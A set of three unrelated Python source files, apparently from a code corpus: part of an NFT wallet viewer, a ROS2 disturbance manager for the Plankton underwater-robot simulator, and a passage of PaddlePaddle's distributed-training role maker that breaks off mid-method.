dpg.add_hover_handler(parent=btn, callback=self.HoverHandler, user_data=hoverData)
dpg.add_table_next_column(parent=self.table)
dpg.add_text(", ".join(row[DataColumns.Properties.name].values()), parent=self.table)
dpg.add_table_next_column(parent=self.table)
def SortTableData(self, column, descending):
with Wallet.TableDataLock:
self.dataUpdated.clear()
Wallet.TableSortPreference = (column, descending)
Wallet.TableData = sorted(Wallet.TableData, key=lambda r: r[column], reverse=descending)
self.dataUpdated.set()
def UpdateTableData(self, walletAddress, contractAddress):
ethPrice = Ethereum.GetEthInFiat(1.0)
netWorthInEth = 0.0
netWorthInFiat = 0.0
i = 0.0
with Wallet.TableDataLock:
self.dataUpdated.clear()
Wallet.TableData.clear()
assets = OpenSea.GetAssets(
walletAddress,
contractAddress,
logInfoCallback=self.logInfoCallback,
logErrorCallback=self.logErrorCallback)
numAssets = float(len(assets))
for asset in assets:
i += 1.0
name = asset['name']
link = asset['permalink']
tokenId = int(asset['token_id'])
imageUrl = asset['image_original_url']
thumbUrl = asset['image_thumbnail_url']
properties = {t['trait_type']:t['value'] for t in asset['traits']}
supply = OpenSea.GetTotalTokenSupply(
baseConfig=self.baseConfig,
cards=self.cards,
tokenId=tokenId,
logInfoCallback=self.logInfoCallback,
logErrorCallback=self.logErrorCallback)
ownedQuantity = Ethereum.GetTokenQuantity(walletAddress, contractAddress, tokenId)
price = OpenSea.GetLastSalePrice(asset)
netWorthInEth += price * ownedQuantity
netWorthInFiat += price * ownedQuantity * ethPrice
usdPrice = price * ethPrice
row = {
DataColumns.TokenId.name : tokenId,
DataColumns.Quantity.name : ownedQuantity,
DataColumns.ETH.name :price,
DataColumns.USD.name : usdPrice,
DataColumns.Name.name : name,
DataColumns.Link.name : link,
DataColumns.ImageUrl.name : imageUrl,
DataColumns.ThumbnailUrl.name : thumbUrl,
DataColumns.Properties.name : properties,
DataColumns.TotalSupply.name : supply['Minted'],
DataColumns.WithheldSupply.name : supply['Withheld'],
DataColumns.UnreleasedPercentage.name : supply['Withheld'] / supply['Minted'] * 100
}
Wallet.TableData.append(row)
try:
percentage = i / numAssets
dpg.set_value(Wallet.ProgressBar, percentage)
dpg.configure_item(Wallet.ProgressBar, overlay="Loaded {0:,} assets.".format(int(i), int(numAssets)))
except Exception as e:
self.logErrorCallback(str(e))
dpg.set_value(self.ethPriceText, "${0:,.2f}".format(ethPrice))
dpg.set_value(self.totalETHText, "{0:,.4f}".format(netWorthInEth))
dpg.set_value(self.totalUSDText, "${0:,.2f}".format(netWorthInFiat))
dpg.set_value(self.lastUpdateText, datetime.now().strftime("%c"))
column, descending = Wallet.TableSortPreference
# we don't need to set the self.dataCompleted event because SortTableData does it
self.SortTableData(column, descending)
|
disturbance_manager.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import sys
import threading
import rclpy
from uuv_world_ros_plugins_msgs.srv import *
from gazebo_msgs.srv import ApplyLinkWrench
from uuv_gazebo_ros_plugins_msgs.srv import SetThrusterState, SetThrusterEfficiency
from geometry_msgs.msg import Point, WrenchStamped, Vector3
from rclpy.node import Node
from plankton_utils.param_helper import parse_nested_params_to_dict
from plankton_utils.time import time_in_float_sec, float_sec_to_int_sec_nano
from plankton_utils.time import is_sim_time
# TODO Probably rewrite
class DisturbanceManager(Node):
def __init__(self, node_name, **kwargs):
super().__init__(node_name,
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
**kwargs)
# sim_time = rclpy.parameter.Parameter('use_sim_time', rclpy.Parameter.Type.BOOL, True)
# self.set_parameters([sim_time])
self._logger = logging.getLogger('dp_local_planner')
out_hdlr = logging.StreamHandler(sys.stdout)
out_hdlr.setFormatter(logging.Formatter('%(asctime)s | %(levelname)s | %(module)s | %(message)s'))
out_hdlr.setLevel(logging.INFO)
self._logger.addHandler(out_hdlr)
self._logger.setLevel(logging.INFO)
self.thread = threading.Thread(target=rclpy.spin, args=(self,), daemon=True)
self.thread.start()
# Load disturbances and check for missing information
specs = dict(current=['starting_time', 'velocity', 'horizontal_angle',
'vertical_angle'],
wrench=['starting_time', 'duration', 'force', 'torque'],
thruster_state=['starting_time', 'thruster_id', 'is_on',
'duration'],
propeller_efficiency=['starting_time', 'thruster_id', 'duration',
'efficiency'],
thrust_efficiency=['starting_time', 'thruster_id', 'duration',
'efficiency'])
thruster_ids = list()
#if self.has_parameter('disturbances'):
#self._logger.info(str(self.get_parameters(['/'])))
self._disturbances = self.get_parameters_by_prefix('disturbances')
self._disturbances = parse_nested_params_to_dict(self._disturbances, unpack_value=True)
if self._disturbances != {}:
#if type(self._disturbances) != list:
# raise RuntimeError('Current specifications must be '
# 'given as a list of dict')
#for i in range(len(self._disturbances)):
for key in self._disturbances.keys():
item = self._disturbances[key]
if type(item) != dict:
raise RuntimeError('Disturbance description must be'
' given as a dict')
if 'type' not in item:
raise RuntimeError('Type of disturbance not '
'specified')
if item['type'] not in specs:
raise RuntimeError(
'Invalid type of disturbance, value=%s' % item['type'])
for spec in specs[item['type']]:
if spec not in item:
raise RuntimeError(
'Invalid current model specification, '
'missing tag=%s' % spec)
if item['type'] == 'thruster_state':
thruster_ids.append(item['thruster_id'])
# Create flag to indicate that perturbation has been applied
self._disturbances[key]['is_applied'] = False
self._disturbances[key]['ended'] = False
else:
raise RuntimeError('No disturbance specifications given')
# List all disturbances to be applied
#for i in range(len(self._disturbances)):
cpt = 0
for key in self._disturbances.keys():
self._logger.info('Disturbance #%d: %s' % (cpt, self._disturbances[key]))
cpt = cpt + 1
self._body_force = np.zeros(3)
self._body_torque = np.zeros(3)
self._body_wrench_msg = WrenchStamped()
# For body wrench disturbances, publish a topic
self._wrench_topic = self.create_publisher(
WrenchStamped, 'wrench_perturbation', 1)
vehicle_name = self.get_namespace().replace('/', '')
# Obtain service proxy
self._service_cb = dict()
service_list = list()
try:
service_list.append(self.create_client(
SetCurrentVelocity, '/hydrodynamics/set_current_velocity'))
self._service_cb['current_velocity'] = service_list[-1]
service_list.append(self.create_client(
ApplyBodyWrench, '/gazebo/apply_body_wrench'))
self._service_cb['wrench'] = service_list[-1]
self._service_cb['thrusters'] = dict()
for item in self._disturbances.values():
if item['type'] == 'thruster_state':
thruster_id = item['thruster_id']
if 'state' not in self._service_cb['thrusters']:
self._service_cb['thrusters']['state'] = dict()
service_list.append(self.create_client(
SetThrusterState,
create_service_name(vehicle_name, thruster_id, 'set_thruster_state')))
#'/%s/thrusters/%d/set_thruster_state' % (vehicle_name, item['thruster_id'])))
self._service_cb['thrusters']['state'][thruster_id] = service_list[-1]
elif item['type'] == 'propeller_efficiency':
if 'propeller_efficiency' not in self._service_cb['thrusters']:
self._service_cb['thrusters']['propeller_efficiency'] = dict()
service_list.append(self.create_client(
SetThrusterEfficiency,
create_service_name(vehicle_name, thruster_id, 'set_dynamic_state_efficiency')))
#'/%s/thrusters/%d/set_dynamic_state_efficiency' % (vehicle_name, item['thruster_id'])))
self._service_cb['thrusters']['propeller_efficiency'][thruster_id] = service_list[-1]
elif item['type'] == 'thrust_efficiency':
if 'thrust_efficiency' not in self._service_cb['thrusters']:
self._service_cb['thrusters']['thrust_efficiency'] = dict()
service_list.append(self.create_client(
SetThrusterEfficiency,
create_service_name(vehicle_name, thruster_id, 'set_thrust_force_efficiency')))
#'/%s/thrusters/%d/set_thrust_force_efficiency' % (vehicle_name, item['thruster_id'])))
self._service_cb['thrusters']['thrust_efficiency'][thruster_id] = service_list[-1]
except Exception as e:
self._logger.info('Service call failed, error=%s' % str(e))
sys.exit(-1)
# Test if services are reachable
try:
#self._service_cb.values()
# services = ['/hydrodynamics/set_current_velocity',
# '/gazebo/apply_body_wrench']
# for item in self._disturbances:
# if item['type'] == 'thruster_state':
# services.append('/%s/thrusters/%d/set_thruster_state' % (vehicle_name, item['thruster_id']))
# elif item['type'] == 'propeller_efficiency':
# services.append('/%s/thrusters/%d/set_dynamic_state_efficiency' % (vehicle_name, item['thruster_id']))
# elif item['type'] == 'thrust_efficiency':
# services.append('/%s/thrusters/%d/set_thrust_force_efficiency' % (vehicle_name, item['thruster_id']))
for s in service_list:
ready = s.wait_for_service(timeout_sec=10)
if not ready:
raise RuntimeError('Service %s not ready' % (s.srv_name))
except Exception as e:
self._logger.error('Some services are not available! message=' + str(e))
self._logger.error('Closing node...')
sys.exit(-1)
self._wrench_timer = self.create_timer(0.1, self._publish_wrench_disturbance)
#rate = self.create_rate(100)
#FREQ = 100
rate = node.create_rate(100)
while rclpy.ok():
t = time_in_float_seconds(self.get_clock().now())
#for i in range(len(self._disturbances)):
for d in self._disturbances.values():
#d = self._disturbances[i]
if t > d['starting_time'] and not d['is_applied']:
###########################################################
if d['type'] == 'current':
self.set_current(d['velocity'], d['horizontal_angle'],
d['vertical_angle'])
###########################################################
elif d['type'] == 'wrench':
self.set_link_wrench(d['force'],
d['torque'],
-1,
d['starting_time'])
###########################################################
elif d['type'] == 'thruster_state':
self.set_thruster_state(d['thruster_id'], bool(d['is_on']))
###########################################################
elif d['type'] == 'propeller_efficiency':
self.set_propeller_efficiency(d['thruster_id'], d['efficiency'])
###########################################################
elif d['type'] == 'thrust_efficiency':
self.set_thrust_efficiency(d['thruster_id'], d['efficiency'])
# Set applied flag to true
#self._disturbances[i]['is_applied'] = True
d['is_applied'] = True
if 'duration' in d:
if d['duration'] == -1:
#self._disturbances[i]['ended'] = True
d['ended'] = True
else:
#self._disturbances[i]['ended'] = True
d['ended'] = True
elif d['is_applied'] and 'duration' in d and not d['ended']:
if d['duration'] > 0:
if self.get_clock().now().nanoseconds > int((d['starting_time'] + d['duration']) * 1e9):
###########################################################
if d['type'] == 'current':
# Set current to zero
self.set_current(0, d['horizontal_angle'],
d['vertical_angle'])
###########################################################
elif d['type'] == 'wrench':
# Cancel out force and torque
self.set_link_wrench([-1 * d['force'][n] for n in range(3)],
[-1 * d['torque'][n] for n in range(3)],
-1,
time_in_float_sec(self.get_clock().now()))
###########################################################
elif d['type'] == 'thruster_state':
self.set_thruster_state(d['thruster_id'], not bool(d['is_on']))
###########################################################
elif d['type'] == 'propeller_efficiency':
self.set_propeller_efficiency(d['thruster_id'], 1.0)
###########################################################
elif d['type'] == 'thrust_efficiency':
self.set_thrust_efficiency(d['thruster_id'], 1.0)
#self._disturbances[i]['ended'] = True
d['ended'] = True
rate.sleep()
# =========================================================================
def __del__(self):
if rclpy.ok():
self.destroy_node()
rclpy.shutdown()
self.thread.join()
# =========================================================================
def _publish_wrench_disturbance(self, event):
msg = WrenchStamped()
msg.header.stamp = self.get_clock().now().to_msg()
msg.header.frame_id = 'world'
msg.wrench.force = Vector3(x=self._body_force[0], y=self._body_force[1], z=self._body_force[2])
msg.wrench.torque = Vector3(x=self._body_torque[0], y=self._body_torque[1], z=self._body_torque[2])
# Publish the applied body wrench
self._wrench_topic.publish(msg)
return True
# =========================================================================
def set_current(self, velocity, horizontal_angle, vertical_angle):
self._logger.info('Appying current velocity model...')
req = SetCurrentVelocity.Request()
req.velocity = velocity
req.horizontal_angle = horizontal_angle
req.vertical_angle = vertical_angle
future = self._service_cb['current_velocity'].call_async(req)
self.wait_for_service_completion(
future,
'Current velocity changed successfully at %f s! vel= %f m/s' % (time_in_float_sec(self.get_clock().now()), velocity),
'Failed to change current velocity')
# if self._service_cb['current_velocity'].call(req):
# self._logger.info('Current velocity changed successfully at %f s! vel= %f m/s' % (time_in_float_sec(self.get_clock().now()), velocity))
# else:
# self._logger.error('Failed to change current velocity')
# =========================================================================
def set_link_wrench(self, force, torque, duration, starting_time):
ns = self.get_namespace().replace('/', '')
body_name = '%s/base_link' % ns
req = ApplyLinkWrench.Request()
self._body_force = np.array([self._body_force[i] + force[i] for i in range(3)])
self._body_torque = np.array([self._body_torque[i] + torque[i] for i in range(3)])
self._body_wrench_msg = WrenchStamped()
self._body_wrench_msg.header.stamp = self.get_clock().now().to_msg()
self._body_wrench_msg.header.frame_id = 'world'
self._body_wrench_msg.wrench.force = Vector3(x=self._body_force[0],
y=self._body_force[1],
z=self._body_force[2])
self._body_wrench_msg.wrench.torque = Vector3(x=self._body_torque[0],
y=self._body_torque[1],
z=self._body_torque[2])
(secs, nsecs) = float_sec_to_int_sec_nano(starting_time)
(d_secs, d_nsecs) = float_sec_to_int_sec_nano(duration)
req.body_name = body_name
req.reference_frame = 'world'
req.reference_point = Point(0, 0, 0)
req.wrench = self._body_wrench_msg.wrench
req.start_time = rclpy.time.Time(seconds=secs, nanoseconds=nsecs).to_msg()
req.duration = rclpy.time.Duration(seconds=d_secs, nanoseconds=d_nsecs).to_msg()
future = self._service_cb['wrench'].call_async(req)
wait_for_service_completion(
future,
'Link wrench perturbation applied!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())),
'Failed to apply link wrench!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# if success:
# self._logger.info('Body wrench perturbation applied!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# else:
# self._logger.error('Failed to apply body wrench!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# =========================================================================
def set_thruster_state(self, thruster_id, is_on):
req = SetThrusterState.Request()
req.on = is_on
future = self._service_cb['thrusters']['state'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
wait_for_service_completion(future,
'Setting state of thruster #%d, state=%s, t=%.2f s' % (thruster_id, 'ON' if is_on else 'OFF', time),
'Setting state of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['state'][thruster_id].call(req):
# self._logger.info('Setting state of thruster #%d, state=%s, t=%.2f s' % (thruster_id, 'ON' if is_on else 'OFF', time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting state of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
def set_propeller_efficiency(self, thruster_id, eff):
req = SetThrusterEfficiency.Request()
req.efficiency = eff
future = self._service_cb['thrusters']['propeller_efficiency'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
wait_for_service_completion(future,
'Setting propeller efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time),
'Setting propeller efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['propeller_efficiency'][thruster_id].call(req):
# time = time_in_float_sec(self.get_clock().now())
# self._logger.info('Setting propeller efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting propeller efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
def set_thrust_efficiency(self, thruster_id, eff):
req = SetThrusterEfficiency.Request()
req.efficiency = eff
future = self._service_cb['thrusters']['thrust_efficiency'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
wait_for_service_completion(
future,
'Setting thrust efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time),
'Setting thrust efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['thrust_efficiency'][thruster_id].call(req):
# time = time_in_float_sec(self.get_clock().now())
# self._logger.info('Setting thrust efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting thrust efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
def wait_for_service_completion(future, success_msg, error_msg):
while not future.done():
try:
response = future.result()
except Exception as e:
self._logger.error(error_msg)
else:
self._logger.info(success_msg)
# =========================================================================
def build_service_name(self, ns, thruster_id, service_name) -> str :
return '/%s/thrusters/id_%d/%s' % (ns, thruster_id, service_name)
# =============================================================================
def main():
print('Starting disturbance manager')
rclpy.init()
try:
sim_time_param = is_sim_time()
node = DisturbanceManager('disturbance_manager', parameter_overrides=[sim_time_param])
rclpy.spin(node)
except rclpy.exceptions.ROSInterruptException as rosInter:
print('Caught ROSInterruptException exception' + str(rosInter))
except Exception as e:
print('Caught exception: '+str(e))
# finally:
# if rclpy.ok():
# rclpy.shutdown()
# node.destroy_node()
# node.thread.join()
print('Exiting')
# =============================================================================
if __name__ == '__main__':
main()
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
size_d = {
"trainer": self._worker_num,
"pserver": self._server_num,
"all": self._worker_num + self._server_num
}
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, role)
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
string: all heter_trainers'endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
def _get_heter_worker_device(self):
"""
Returns:
string: heter_trainer's device of current node, e.g: CPU/GPU/XPU
"""
return self._heter_trainer_device.upper()
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
retrun the current number of worker
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
